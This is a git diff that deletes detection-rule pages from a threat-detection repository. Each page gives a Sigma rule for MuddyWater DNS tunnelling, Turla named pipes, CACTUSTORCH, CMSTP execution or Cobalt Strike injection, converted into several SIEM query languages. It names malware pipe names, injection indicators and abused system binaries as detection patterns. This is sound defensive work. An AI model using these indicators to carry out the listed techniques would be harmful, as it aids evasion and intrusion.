-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\powershell.exe") -and ($_.message -match "ParentImage.*.*\\excel.exe") -and ($_.message -match "CommandLine.*.*DataExchange.dll.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:(*\\powershell.exe) AND winlog.event_data.ParentImage.keyword:(*\\excel.exe) AND winlog.event_data.CommandLine.keyword:(*DataExchange.dll*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/36222790-0d43-4fe8-86e4-674b27809543 <<EOF
-{
-  "metadata": {
-    "title": "DNS Tunnel Technique from MuddyWater",
-    "description": "Detecting DNS tunnel activity for Muddywater actor",
-    "tags": [
-      "attack.command_and_control",
-      "attack.t1071",
-      "attack.t1071.004"
-    ],
-    "query": "(winlog.event_data.Image.keyword:(*\\\\powershell.exe) AND winlog.event_data.ParentImage.keyword:(*\\\\excel.exe) AND winlog.event_data.CommandLine.keyword:(*DataExchange.dll*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:(*\\\\powershell.exe) AND winlog.event_data.ParentImage.keyword:(*\\\\excel.exe) AND winlog.event_data.CommandLine.keyword:(*DataExchange.dll*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'DNS Tunnel Technique from MuddyWater'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:(*\\powershell.exe) AND ParentImage.keyword:(*\\excel.exe) AND CommandLine.keyword:(*DataExchange.dll*))
-```
-
-
-### splunk
-    
-```
-((Image="*\\powershell.exe") (ParentImage="*\\excel.exe") (CommandLine="*DataExchange.dll*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image IN ["*\\powershell.exe"] ParentImage IN ["*\\excel.exe"] CommandLine IN ["*DataExchange.dll*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*\powershell\.exe))(?=.*(?:.*.*\excel\.exe))(?=.*(?:.*.*DataExchange\.dll.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/sysmon_apt_turla_namedpipes.md b/Atomic_Threat_Coverage/Detection_Rules/sysmon_apt_turla_namedpipes.md
deleted file mode 100644
index 0db019b..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/sysmon_apt_turla_namedpipes.md
+++ /dev/null
@@ -1,181 +0,0 @@
-| Title                    | Turla Group Named Pipes       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a named pipe used by Turla group samples |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unkown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[Internal Research](Internal Research)</li></ul>  |
-| **Author**               | Markus Neis |
-| Other Tags           | <ul><li>attack.g0010</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Turla Group Named Pipes
-id: 739915e4-1e70-4778-8b8a-17db02f66db1
-status: experimental
-description: Detects a named pipe used by Turla group samples
-references:
-    - Internal Research
-date: 2017/11/06
-tags:
-    - attack.g0010
-author: Markus Neis
-logsource:
-    product: windows
-    service: sysmon
-    definition: 'Note that you have to configure logging for PipeEvents in Symson config'
-detection:
-    selection:
-        EventID: 
-            - 17
-            - 18
-        PipeName: 
-            - '\atctl' # https://www.virustotal.com/#/file/a4ddb2664a6c87a1d3c5da5a5a32a5df9a0b0c8f2e951811bd1ec1d44d42ccf1/detection
-            - '\userpipe' # ruag apt case
-            - '\iehelper' # ruag apt case
-            - '\sdlrpc' # project cobra https://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra
-            - '\comnap' # https://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra
-            # - '\rpc'  # may cause too many false positives : http://kb.palisade.com/index.php?pg=kb.page&id=483
-    condition: selection
-falsepositives:
-    - Unkown
-level: critical
-
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "17" -or $_.ID -eq "18") -and ($_.message -match "\\atctl" -or $_.message -match "\\userpipe" -or $_.message -match "\\iehelper" -or $_.message -match "\\sdlrpc" -or $_.message -match "\\comnap")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:("17" OR "18") AND winlog.event_data.PipeName:("\\atctl" OR "\\userpipe" OR "\\iehelper" OR "\\sdlrpc" OR "\\comnap"))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/739915e4-1e70-4778-8b8a-17db02f66db1 <<EOF
-{
-  "metadata": {
-    "title": "Turla Group Named Pipes",
-    "description": "Detects a named pipe used by Turla group samples",
-    "tags": [
-      "attack.g0010"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:(\"17\" OR \"18\") AND winlog.event_data.PipeName:(\"\\\\atctl\" OR \"\\\\userpipe\" OR \"\\\\iehelper\" OR \"\\\\sdlrpc\" OR \"\\\\comnap\"))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:(\"17\" OR \"18\") AND winlog.event_data.PipeName:(\"\\\\atctl\" OR \"\\\\userpipe\" OR \"\\\\iehelper\" OR \"\\\\sdlrpc\" OR \"\\\\comnap\"))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Turla Group Named Pipes'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:("17" "18") AND PipeName:("\\atctl" "\\userpipe" "\\iehelper" "\\sdlrpc" "\\comnap"))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" (EventCode="17" OR EventCode="18") (PipeName="\\atctl" OR PipeName="\\userpipe" OR PipeName="\\iehelper" OR PipeName="\\sdlrpc" OR PipeName="\\comnap"))
-```
-
-
-### logpoint
-    
-```
-(event_id IN ["17", "18"] PipeName IN ["\\atctl", "\\userpipe", "\\iehelper", "\\sdlrpc", "\\comnap"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*17|.*18))(?=.*(?:.*\atctl|.*\userpipe|.*\iehelper|.*\sdlrpc|.*\comnap)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/sysmon_cactustorch.md b/Atomic_Threat_Coverage/Detection_Rules/sysmon_cactustorch.md
deleted file mode 100644
index 578bc8e..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/sysmon_cactustorch.md
+++ /dev/null
@@ -1,183 +0,0 @@
-| Title                    | CACTUSTORCH Remote Thread Creation       |
-|:-------------------------|:------------------|
-| **Description**          | Detects remote thread creation from CACTUSTORCH as described in references. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1055: Process Injection](https://attack.mitre.org/techniques/T1055)</li><li>[T1064: Scripting](https://attack.mitre.org/techniques/T1064)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1055: Process Injection](../Triggers/T1055.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/SBousseaden/status/1090588499517079552](https://twitter.com/SBousseaden/status/1090588499517079552)</li><li>[https://github.com/mdsecactivebreach/CACTUSTORCH](https://github.com/mdsecactivebreach/CACTUSTORCH)</li></ul>  |
-| **Author**               | @SBousseaden (detection), Thomas Patzke (rule) |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: CACTUSTORCH Remote Thread Creation
-id: 2e4e488a-6164-4811-9ea1-f960c7359c40
-description: Detects remote thread creation from CACTUSTORCH as described in references.
-references:
-    - https://twitter.com/SBousseaden/status/1090588499517079552
-    - https://github.com/mdsecactivebreach/CACTUSTORCH
-status: experimental
-author: '@SBousseaden (detection), Thomas Patzke (rule)'
-date: 2019/02/01
-logsource:
-    product: windows
-    service: sysmon
-detection:
-    selection:
-        EventID: 8
-        SourceImage:
-            - '*\System32\cscript.exe'
-            - '*\System32\wscript.exe'
-            - '*\System32\mshta.exe'
-            - '*\winword.exe'
-            - '*\excel.exe'
-        TargetImage: '*\SysWOW64\\*'
-        StartModule: null
-    condition: selection
-tags:
-    - attack.execution
-    - attack.t1055
-    - attack.t1064
-falsepositives:
-    - unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "8" -and ($_.message -match "SourceImage.*.*\\System32\\cscript.exe" -or $_.message -match "SourceImage.*.*\\System32\\wscript.exe" -or $_.message -match "SourceImage.*.*\\System32\\mshta.exe" -or $_.message -match "SourceImage.*.*\\winword.exe" -or $_.message -match "SourceImage.*.*\\excel.exe") -and $_.message -match "TargetImage.*.*\\SysWOW64\\.*" -and -not StartModule="*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:"8" AND winlog.event_data.SourceImage.keyword:(*\\System32\\cscript.exe OR *\\System32\\wscript.exe OR *\\System32\\mshta.exe OR *\\winword.exe OR *\\excel.exe) AND winlog.event_data.TargetImage.keyword:*\\SysWOW64\\* AND NOT _exists_:winlog.event_data.StartModule)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/2e4e488a-6164-4811-9ea1-f960c7359c40 <<EOF
-{
-  "metadata": {
-    "title": "CACTUSTORCH Remote Thread Creation",
-    "description": "Detects remote thread creation from CACTUSTORCH as described in references.",
-    "tags": [
-      "attack.execution",
-      "attack.t1055",
-      "attack.t1064"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"8\" AND winlog.event_data.SourceImage.keyword:(*\\\\System32\\\\cscript.exe OR *\\\\System32\\\\wscript.exe OR *\\\\System32\\\\mshta.exe OR *\\\\winword.exe OR *\\\\excel.exe) AND winlog.event_data.TargetImage.keyword:*\\\\SysWOW64\\\\* AND NOT _exists_:winlog.event_data.StartModule)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"8\" AND winlog.event_data.SourceImage.keyword:(*\\\\System32\\\\cscript.exe OR *\\\\System32\\\\wscript.exe OR *\\\\System32\\\\mshta.exe OR *\\\\winword.exe OR *\\\\excel.exe) AND winlog.event_data.TargetImage.keyword:*\\\\SysWOW64\\\\* AND NOT _exists_:winlog.event_data.StartModule)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'CACTUSTORCH Remote Thread Creation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"8" AND SourceImage.keyword:(*\\System32\\cscript.exe *\\System32\\wscript.exe *\\System32\\mshta.exe *\\winword.exe *\\excel.exe) AND TargetImage.keyword:*\\SysWOW64\\* AND NOT _exists_:StartModule)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="8" (SourceImage="*\\System32\\cscript.exe" OR SourceImage="*\\System32\\wscript.exe" OR SourceImage="*\\System32\\mshta.exe" OR SourceImage="*\\winword.exe" OR SourceImage="*\\excel.exe") TargetImage="*\\SysWOW64\\*" NOT StartModule="*")
-```
-
-
-### logpoint
-    
-```
-(event_id="8" SourceImage IN ["*\\System32\\cscript.exe", "*\\System32\\wscript.exe", "*\\System32\\mshta.exe", "*\\winword.exe", "*\\excel.exe"] TargetImage="*\\SysWOW64\\*" -StartModule=*)
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*8)(?=.*(?:.*.*\System32\cscript\.exe|.*.*\System32\wscript\.exe|.*.*\System32\mshta\.exe|.*.*\winword\.exe|.*.*\excel\.exe))(?=.*.*\SysWOW64\\.*)(?=.*(?!StartModule)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/sysmon_cmstp_execution.md b/Atomic_Threat_Coverage/Detection_Rules/sysmon_cmstp_execution.md
deleted file mode 100644
index d2d4aef..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/sysmon_cmstp_execution.md
+++ /dev/null
@@ -1,288 +0,0 @@
-| Title                    | CMSTP Execution       |
-|:-------------------------|:------------------|
-| **Description**          | Detects various indicators of Microsoft Connection Manager Profile Installer execution |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1191: CMSTP](https://attack.mitre.org/techniques/T1191)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Legitimate CMSTP use (unlikely in modern enterprise environments)</li></ul>  |
-| **Development Status**   | stable |
-| **References**           | <ul><li>[https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/](https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/)</li></ul>  |
-| **Author**               | Nik Seetharaman |
-| Other Tags           | <ul><li>attack.g0069</li><li>car.2019-04-001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-action: global
-title: CMSTP Execution
-id: 9d26fede-b526-4413-b069-6e24b6d07167
-status: stable
-description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
-tags:
-    - attack.defense_evasion
-    - attack.execution
-    - attack.t1191
-    - attack.g0069
-    - car.2019-04-001
-author: Nik Seetharaman
-date: 2018/07/16
-references:
-    - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
-detection:
-    condition: 1 of them
-fields:
-    - CommandLine
-    - ParentCommandLine
-    - Details
-falsepositives:
-    - Legitimate CMSTP use (unlikely in modern enterprise environments)
-level: high
----
-logsource:
-    product: windows
-    service: sysmon
-detection:
-    # Registry Object Add
-    selection2:
-        EventID: 12
-        TargetObject: '*\cmmgr32.exe*'
-        EventType: 'CreateKey'
-    # Registry Object Value Set
-    selection3:
-        EventID: 13
-        TargetObject: '*\cmmgr32.exe*'
-    # Process Access Call Trace
-    selection4:
-        EventID: 10
-        CallTrace: '*cmlua.dll*'
----
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    # CMSTP Spawning Child Process
-    selection1:
-        ParentImage: '*\cmstp.exe'
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {((($_.ID -eq "12" -and $_.message -match "TargetObject.*.*\\cmmgr32.exe.*" -and $_.message -match "EventType.*CreateKey") -or ($_.ID -eq "13" -and $_.message -match "TargetObject.*.*\\cmmgr32.exe.*") -or ($_.ID -eq "10" -and $_.message -match "CallTrace.*.*cmlua.dll.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "ParentImage.*.*\\cmstp.exe") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND ((winlog.event_id:"12" AND winlog.event_data.TargetObject.keyword:*\\cmmgr32.exe* AND winlog.event_data.EventType:"CreateKey") OR (winlog.event_id:"13" AND winlog.event_data.TargetObject.keyword:*\\cmmgr32.exe*) OR (winlog.event_id:"10" AND winlog.event_data.CallTrace.keyword:*cmlua.dll*)))
-winlog.event_data.ParentImage.keyword:*\\cmstp.exe
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/9d26fede-b526-4413-b069-6e24b6d07167 <<EOF
-{
-  "metadata": {
-    "title": "CMSTP Execution",
-    "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.execution",
-      "attack.t1191",
-      "attack.g0069",
-      "car.2019-04-001"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND ((winlog.event_id:\"12\" AND winlog.event_data.TargetObject.keyword:*\\\\cmmgr32.exe* AND winlog.event_data.EventType:\"CreateKey\") OR (winlog.event_id:\"13\" AND winlog.event_data.TargetObject.keyword:*\\\\cmmgr32.exe*) OR (winlog.event_id:\"10\" AND winlog.event_data.CallTrace.keyword:*cmlua.dll*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND ((winlog.event_id:\"12\" AND winlog.event_data.TargetObject.keyword:*\\\\cmmgr32.exe* AND winlog.event_data.EventType:\"CreateKey\") OR (winlog.event_id:\"13\" AND winlog.event_data.TargetObject.keyword:*\\\\cmmgr32.exe*) OR (winlog.event_id:\"10\" AND winlog.event_data.CallTrace.keyword:*cmlua.dll*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'CMSTP Execution'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}\n          Details = {{_source.Details}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/9d26fede-b526-4413-b069-6e24b6d07167-2 <<EOF
-{
-  "metadata": {
-    "title": "CMSTP Execution",
-    "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.execution",
-      "attack.t1191",
-      "attack.g0069",
-      "car.2019-04-001"
-    ],
-    "query": "winlog.event_data.ParentImage.keyword:*\\\\cmstp.exe"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.ParentImage.keyword:*\\\\cmstp.exe",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'CMSTP Execution'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}\n          Details = {{_source.Details}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:"12" AND TargetObject.keyword:*\\cmmgr32.exe* AND EventType:"CreateKey") OR (EventID:"13" AND TargetObject.keyword:*\\cmmgr32.exe*) OR (EventID:"10" AND CallTrace.keyword:*cmlua.dll*))
-ParentImage.keyword:*\\cmstp.exe
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" ((EventCode="12" TargetObject="*\\cmmgr32.exe*" EventType="CreateKey") OR (EventCode="13" TargetObject="*\\cmmgr32.exe*") OR (EventCode="10" CallTrace="*cmlua.dll*"))) | table CommandLine,ParentCommandLine,Details
-ParentImage="*\\cmstp.exe" | table CommandLine,ParentCommandLine,Details
-```
-
-
-### logpoint
-    
-```
-((event_id="12" TargetObject="*\\cmmgr32.exe*" EventType="CreateKey") OR (event_id="13" TargetObject="*\\cmmgr32.exe*") OR (event_id="10" CallTrace="*cmlua.dll*"))
-(event_id="1" ParentImage="*\\cmstp.exe")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*12)(?=.*.*\cmmgr32\.exe.*)(?=.*CreateKey))|.*(?:.*(?=.*13)(?=.*.*\cmmgr32\.exe.*))|.*(?:.*(?=.*10)(?=.*.*cmlua\.dll.*))))'
-grep -P '^.*\cmstp\.exe'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/sysmon_cobaltstrike_process_injection.md b/Atomic_Threat_Coverage/Detection_Rules/sysmon_cobaltstrike_process_injection.md
deleted file mode 100644
index edf7556..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/sysmon_cobaltstrike_process_injection.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | CobaltStrike Process Injection       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1055: Process Injection](https://attack.mitre.org/techniques/T1055)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1055: Process Injection](../Triggers/T1055.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f](https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f)</li><li>[https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/](https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/)</li></ul>  |
-| **Author**               | Olaf Hartong, Florian Roth, Aleksey Potapov, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: CobaltStrike Process Injection
-id: 6309645e-122d-4c5b-bb2b-22e4f9c2fa42
-description: Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons
-references:
-    - https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f
-    - https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/
-tags:
-    - attack.defense_evasion
-    - attack.t1055
-status: experimental
-author: Olaf Hartong, Florian Roth, Aleksey Potapov, oscd.community
-date: 2018/11/30
-modified: 2019/11/08
-logsource:
-    product: windows
-    service: sysmon
-detection:
-    selection:
-        EventID: 8
-        TargetProcessAddress|endswith: 
-            - '0B80'
-            - '0C7C'
-            - '0C88'
-    condition: selection
-falsepositives:
-    - unknown
-level: high
-
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "8" -and ($_.message -match "TargetProcessAddress.*.*0B80" -or $_.message -match "TargetProcessAddress.*.*0C7C" -or $_.message -match "TargetProcessAddress.*.*0C88")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:"8" AND TargetProcessAddress.keyword:(*0B80 OR *0C7C OR *0C88))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/6309645e-122d-4c5b-bb2b-22e4f9c2fa42 <<EOF
-{
-  "metadata": {
-    "title": "CobaltStrike Process Injection",
-    "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1055"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"8\" AND TargetProcessAddress.keyword:(*0B80 OR *0C7C OR *0C88))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"8\" AND TargetProcessAddress.keyword:(*0B80 OR *0C7C OR *0C88))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
